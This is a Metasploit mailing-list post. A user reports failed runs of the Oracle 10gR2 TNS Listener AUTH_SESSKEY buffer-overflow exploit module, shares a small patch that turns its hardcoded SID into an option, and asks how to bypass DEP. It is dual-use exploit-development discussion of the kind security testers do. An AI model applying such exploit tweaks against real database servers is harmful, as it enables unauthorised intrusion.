Metasploit mailing list archives
[enhacement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
From: Lukas Kuzmiak <lukash () backstep net>
Date: Wed, 11 Jan 2012 08:55:29 +0100
Hello there, while playing with metasploit and Oracle I came to mentioned exploit and tried to use it agains Oracle Express Edition, getting this: [*] Automatically detected target "Oracle 10.2.0.1.0 Enterprise Edition" [*] Sending NSPTCN packet ... [*] Re-sending NSPTCN packet ... [-] Exploit exception: OOPS, maybe the service hasn't started completely yet, try again... [*] Exploit completed, but no session was created. after reviewing the exploit I discovered there's a hardcoded sid ORCL, however this may not exists on every oracle system, so here's a tiny patch to turn it into an option. can someone merge it please (if considered useful)? however even after disabling DEP exploits never finishes as it's supposed to - after call to kpoauth oracle.exe just ends up crashing like: Access violation when reading [644B566A] I haven't yet managed to look into this, but I'm going to - keeping this bug in mind http://dev.metasploit.com/redmine/issues/812 I wanted to ask if there's some more generic way to bypass DEP in metasploit already or if there's a recommended approach, I'd like to try implementing it into the module once digging into it while debugging the issue mentioned above. Thanks! Cheers, Lukas Index: modules/exploits/windows/oracle/tns_auth_sesskey.rb =================================================================== --- modules/exploits/windows/oracle/tns_auth_sesskey.rb (revision 14537) +++ modules/exploits/windows/oracle/tns_auth_sesskey.rb (working copy) @@ -71,7 +71,8 @@ register_options( [ - Opt::RPORT(1521) + Opt::RPORT(1521), + OptString.new('SID', [ true, 'The database sid (has to exist!)', 'ORCL']) ], self.class) end @@ -125,7 +126,7 @@ connect_data = "" + "(DESCRIPTION=" + "(CONNECT_DATA=" + - "(SERVICE_NAME=orcl)" + + "(SERVICE_NAME=#{datastore['SID']})" + "(CID=" + "(PROGRAM=client.exe)" + "(HOST=client_host)" +
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- [enhacement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow Lukas Kuzmiak (Jan 10)
- Re: [enhacement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow Tod Beardsley (Jan 11)
- Re: [enhacement+question] Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow Joshua J. Drake (Jan 11)